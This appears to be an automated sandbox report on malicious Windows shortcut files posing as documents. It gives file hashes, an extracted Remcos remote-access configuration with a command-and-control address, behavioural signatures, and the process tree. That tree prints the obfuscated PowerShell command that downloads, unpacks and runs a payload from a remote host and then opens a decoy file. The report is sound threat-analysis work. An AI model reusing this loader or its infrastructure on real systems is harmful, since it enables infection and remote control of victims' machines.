Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07-09-2024 01:16
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240903-en
General
-
Target
oshad_88.docx.lnk
-
Size
15KB
-
MD5
64a52682aa182ab4a0e2cebaeaad3f17
-
SHA1
372c0fdf264c4204b490e11717e51d4ffd97b694
-
SHA256
9549f73133514942aadfcf6f3f38f5d89e573ba7d9b18cde44f29f0a172d7c32
-
SHA512
21dab4c078f34e63677eed29a80f240e0d9687e91a4868f6fa812ede45aec7133242c3c5fa9a324b1ca9040407a4c584ffc820c4617efd712314821a6bc2e5b4
-
SSDEEP
48:88muavUQSIuvZujofxvUZ7HEVxCTI2evUZ7vUqbbudCZZGXu/dZZIa7x:88y81vZiofxHVxCTIRVqeuqQ
Malware Config
Extracted
remcos
stalagg
5.181.156.117:8576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-5TL39W
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2588 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 2828 scr_previw.exe 4516 scr_previw.exe -
Loads dropped DLL 2 IoCs
pid Process 2828 scr_previw.exe 4516 scr_previw.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4516 set thread context of 2672 4516 scr_previw.exe 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2568 WINWORD.EXE 2568 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2588 powershell.exe 2588 powershell.exe 2828 scr_previw.exe 4516 scr_previw.exe 4516 scr_previw.exe 2672 cmd.exe 2672 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4516 scr_previw.exe 2672 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 2568 WINWORD.EXE 2568 WINWORD.EXE 2568 WINWORD.EXE 2568 WINWORD.EXE 2568 WINWORD.EXE 2568 WINWORD.EXE 2568 WINWORD.EXE 2568 WINWORD.EXE 2568 WINWORD.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 4456 wrote to memory of 2588 4456 cmd.exe 84 PID 4456 wrote to memory of 2588 4456 cmd.exe 84 PID 2588 wrote to memory of 2828 2588 powershell.exe 98 PID 2588 wrote to memory of 2828 2588 powershell.exe 98 PID 2588 wrote to memory of 2828 2588 powershell.exe 98 PID 2588 wrote to memory of 2568 2588 powershell.exe 99 PID 2588 wrote to memory of 2568 2588 powershell.exe 99 PID 2828 wrote to memory of 4516 2828 scr_previw.exe 100 PID 2828 wrote to memory of 4516 2828 scr_previw.exe 100 PID 2828 wrote to memory of 4516 2828 scr_previw.exe 100 PID 4516 wrote to memory of 2672 4516 scr_previw.exe 101 PID 4516 wrote to memory of 2672 4516 scr_previw.exe 101 PID 4516 wrote to memory of 2672 4516 scr_previw.exe 101 PID 4516 wrote to memory of 2672 4516 scr_previw.exe 101 PID 2672 wrote to memory of 4112 2672 cmd.exe 107 PID 2672 wrote to memory of 4112 2672 cmd.exe 107 PID 2672 wrote to memory of 4112 2672 cmd.exe 107 PID 2672 wrote to memory of 4112 2672 cmd.exe 107 PID 2672 wrote to memory of 4112 2672 cmd.exe 107
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo VkGdaYkxoSDqagAIMUSqWeFFKWBdyoLFWRVEvjodFocYsOlZlDgEkQa; echo VhNVdmCjPvnIlvvpkwnxlfeIqZy; echo UwsGnhMnhQixhmuGlsBMAPSDKSsWQDTvdxNCBxsgEjgUchAAbOiaDRD; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EYBUMEUtkQyUZiebvxwQgurwULNqqzvPMqEGDCvesKCkTRWVCRwLrUXxdJ; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo DaHNXRcvYEIwZocbzUwYQhKQphrgcaAkqoP; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/oshad_88.docx -OutFile oshad_88.docx; echo vKOMValDMwyQRtxOaMEdppITpcmMluNArXmDGCX; s''t''a''rt oshad_88.docx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exeC:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:4112
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\oshad_88.docx" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2568
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD50d0d13604547ff1545c5e359d7a3bcd9
SHA150b3a26220f2b399f4fc81322f7de3c4aeccd777
SHA2561063fc28f35a18c26fd43971c443d3b085917d11a558d6b13ca1c3ddb8988ec3
SHA5128209966354f290c15bb653f59febdbcff0d27510d8ec89a116e8e65bb7cbe6d684d5f2121856cd043bffe79a4f8bc149343610493eeb01da5a7775f1c28148cf
-
Filesize
262B
MD5f204727248ec528893b174f890a46c28
SHA139d1342f45ad94b1f3f3daf44e72c87b7331507a
SHA256076ce1009f8a4b6a8b6be19e44bf16f5eba1a2144971d7c352b281c42e755d34
SHA5126adeda9e8b12efa6d61366d490a1e4c4843ba471771a64923f41e536686a8736d96269c42ea4fd6b9460f869741e2b32f54bcfd0ef51ff1d02fe7feeb26b5987
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD5e72dc02d4a4148328879071fd6a60fe4
SHA13cb529b729e3e24078771e77334fbac53687b312
SHA25616826e80fcea16f2f12d1776e8df2c5bf75a1ae1b2f1740cd69f01bbc7b47998
SHA51248bdba760866918c12e9e441e6384670b0b7ef413eb75fbe9b20b608c056d28b8223aad81ff3237b356a758d0331c4b3e552f2b1b4fb96e47dba5d18c5c47f17
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize2KB
MD5f41765073227f3dbe6e25746d51f2a13
SHA137b41ffb9944b48183ae75feb59e2e4915cab9e9
SHA256851f0a813b8228bcc8d0d0c5f25636e1583549519d9c75360d66a3faaf2bce33
SHA5128e2772db3de44ae6206d1e6491660b452b2b7055b945ce17ebd5a9cef6eceb078a391fcc40d41e025da5a9e72c7ade268f078b8f11af2e90fb03e8ce5e52c475
-
Filesize
1.9MB
MD546e435aecb557fcb16ae2ea3b22ab7fd
SHA15290156599fd9575c4401c80949ad5672fe64da5
SHA25670e0b720bb461503acbd947a8355fb629d703b8d7f99ddfbb09a0c71886861da
SHA512621010aa44868062361c6dbb670f8664c370ddcb0afbb5835765470522c03bb5ac779e86236cfffdcf343cbc582f81beacd2a7108d78c90d4dfc4c38e7d23bb3
-
Filesize
1.0MB
MD5289d2d639e058b63ebe16bd8d543115d
SHA1969736e5f6a2c416f556e2f73358020573486afc
SHA256f21bf56c8d15824dc1cf4108725f73154b88a89ab23f00a7f8dbb2d2de8e2568
SHA5127adf83c9795d9705c4c1345422d17ad26b6d4f27a8242674f44b2d2a05080e532d9a64c43803164bf25c4e9eb5cac7a0d3789d71e9f34b46b5b9c6203fad65aa
-
Filesize
2.2MB
MD5d9530ecee42acccfd3871672a511bc9e
SHA189b4d2406f1294bd699ef231a4def5f495f12778
SHA25681e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280
SHA512d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980
-
Filesize
80KB
MD5cae9827c507632c4a1980479c21a42a2
SHA1d9a1c5900a93066645bf8fb7c79dacf56f3eaa3e
SHA256efeec4c2f612130ec81f3796bba26471e14dcf97b0e22247b7c7f40ad2eba0cf
SHA512441fb631ed26bfe5b84c4fd267a43fbacc64e0adae0e90d0d8e11a248fa2ab47d43a54f1cc3903532943d158d87a2e236976830834545b0d13471731b6f61768
-
Filesize
15KB
MD535a1aa0fc4972286c1db07e513c3abbc
SHA189f5e48e02a03978cd7931651518472c38a7b272
SHA256be338409f57304177e56712593a9345b54d8361ef1fdc767a2fc683a6508cb4e
SHA512f111c86ea937763d091ed195507ee9b3bc95854e22bf31142a9e96bdeb5c273f91f803ea463f8296d5ce611de3a9d959e993fbc03261022a074a203d14ad29c4